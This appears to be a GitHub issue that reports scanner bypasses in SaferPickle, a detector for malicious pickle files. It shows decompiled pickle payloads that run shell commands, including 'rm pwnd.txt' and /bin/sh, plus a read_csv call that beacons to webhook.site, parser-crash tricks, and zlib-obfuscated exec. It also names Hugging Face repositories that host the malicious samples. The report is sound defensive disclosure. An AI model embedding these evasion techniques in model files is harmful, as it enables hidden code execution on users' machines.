Multiple False Negative Issues

# SaferPickle: Multiple False Negative Issues

**Tested version:** commit `5de2ca4c74c3ebd6a3291a40ff56249b7495a3d6`

## Summary

During a systematic evaluation of malicious model files on Hugging Face, I identified several categories of pickle-based evasion techniques that SaferPickle fails to detect. Each section below includes a description of the technique and a reference to an actual malicious model file on Hugging Face.

---

## 1. Alternative Execution Primitives

Malicious pickle files can invoke command execution or exfiltration through functions not present in SaferPickle's denylist. Since the set of exploitable callables in the Python ecosystem is large, denylist coverage is inherently incomplete.

**Command execution via `torch.utils.collect_env.run`:**
```python
from torch.library import torch.utils.collect_env.run
_var0 = torch.utils.collect_env.run('rm pwnd.txt')
```

**Command execution via `multiprocessing.util.spawnv_passfds`:**
```python
from multiprocessing.util import spawnv_passfds
_var0 = spawnv_passfds(b'/bin/sh', ('/bin/sh', '-c', 'echo bypass'), ())
```

**Command execution via `mlflow.projects.backend.local._run_entry_point`:**
```python
from mlflow.projects.backend.local import _run_entry_point
_var0 = _run_entry_point('echo "You\'ve been pwned."', '.', '', '')
```

**Data exfiltration via `pandas.io.parsers.readers.read_csv`:**
```python
from pandas.io.parsers.readers import read_csv
_var0 = read_csv('https://webhook.site/...?pwned=pandas_bypass')
```

| Sample | HF Model ID | Filename |
|--------|-------------|----------|
| `torch.utils.collect_env.run` | ias-d-kt/ias-1 | indirect_import.pkl |
| `spawnv_passfds` | aakashjapi/tmp | poc_spawnv_passfds.pkl |
| `_run_entry_point` | agentops/text-generation | pytorch_model.bin |
| `read_csv` | Tanaka53814545/pickle-model-test | pytorch_model.bin |

---

## 2. `zipfile` Exception

PyTorch's custom Zip extractor differs from the standard Python `zipfile` module used by SaferPickle. A crafted model can exploit this gap to crash SaferPickle via a `BadZipFile` exception while PyTorch loads it normally. Prior research by Liu et al. ([arXiv:2508.19774](https://arxiv.org/abs/2508.19774)) describes this technique.

SaferPickle crashes with:
```
zipfile.BadZipFile: File name in directory '…/data.pkl' and header b'…/data.pal' differ.
```

| Sample | HF Model ID | Filename |
|--------|-------------|----------|
| zipfile crash | HFscanner1231/malware_opcode_frequencies | does_not_scan_but_opens_in_torch.pth |

---

## 3. `pickletools` Exception

Appending a truncated opcode (e.g., `BINUNICODE` without its required length prefix) after the malicious payload causes a `ValueError` in `pickletools.genops`. The `pickle` module executes opcodes sequentially, so the payload runs at `REDUCE` before the corrupted tail is reached.

```
   0: 80 PROTO           2
   2: 63 GLOBAL          'builtins exec'
  17: 28 MARK
  18: 58 BINUNICODE      "\nf = open('my_file.txt', 'a'); f.write('Malicious'); f.close()"
  85: 74 TUPLE
  86: 52 REDUCE
  87: 58 ???              ← truncated opcode crashes pickletools
```

This technique was first reported by [ReversingLabs](https://www.reversinglabs.com/blog/rl-identifies-malware-ml-model-hosted-on-hugging-face) as an evasion against PickleScan, which has since been patched.

| Sample | HF Model ID | Filename |
|--------|-------------|----------|
| pickletools crash | kemalik/42-eicar | model_broken_X.pkl |

---

## 4. Obfuscation

Malicious pickle files that compress the payload with `zlib` are not detected. The `zlib.decompress` call itself is not on the denylist, and the compressed blob hides the actual malicious code (e.g., `os.system`, `subprocess`) from pattern matching.

```python
from zlib import decompress
_var0 = decompress(b'x\xda\xbdWmk\xe3F\x10\xfe...(truncated)')
_var1 = exec(_var0)
```

| Sample | HF Model ID | Filename |
|--------|-------------|----------|
| zlib obfuscation | coldwaterq/sectest | coldwaterq_inject_calc.pt |

---

## 5. Indirect Model Loading

A pickle file loads another malicious model from the Hugging Face Hub during deserialization. Hub downloads are common in normal inference code but unusual during model loading.

```python
from transformers.models.auto.auto_factory import getattribute_from_module
from transformers.models.auto.tokenization_auto import AutoTokenizer
_var0 = getattribute_from_module(AutoTokenizer, 'from_pretrained')
_var1 = _var0('zpbrent/reuse')
```

This technique was originally introduced by [JFrog](https://jfrog.com/blog/jfrog-and-hugging-face-join-forces/).

| Sample | HF Model ID | Filename |
|--------|-------------|----------|
| Indirect model loading | protectai-bot/transfo-xl | vocab.pkl |


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Multiple False Negative Issues #18

SaferPickle: Multiple False Negative Issues

Summary

1. Alternative Execution Primitives

2. `zipfile` Exception

3. `pickletools` Exception

4. Obfuscation

5. Indirect Model Loading

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Sample	HF Model ID	Filename
`torch.utils.collect_env.run`	ias-d-kt/ias-1	indirect_import.pkl
`spawnv_passfds`	aakashjapi/tmp	poc_spawnv_passfds.pkl
`_run_entry_point`	agentops/text-generation	pytorch_model.bin
`read_csv`	Tanaka53814545/pickle-model-test	pytorch_model.bin

Multiple False Negative Issues #18

Description

SaferPickle: Multiple False Negative Issues

Summary

1. Alternative Execution Primitives

2. zipfile Exception

3. pickletools Exception

4. Obfuscation

5. Indirect Model Loading

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions

2. `zipfile` Exception

3. `pickletools` Exception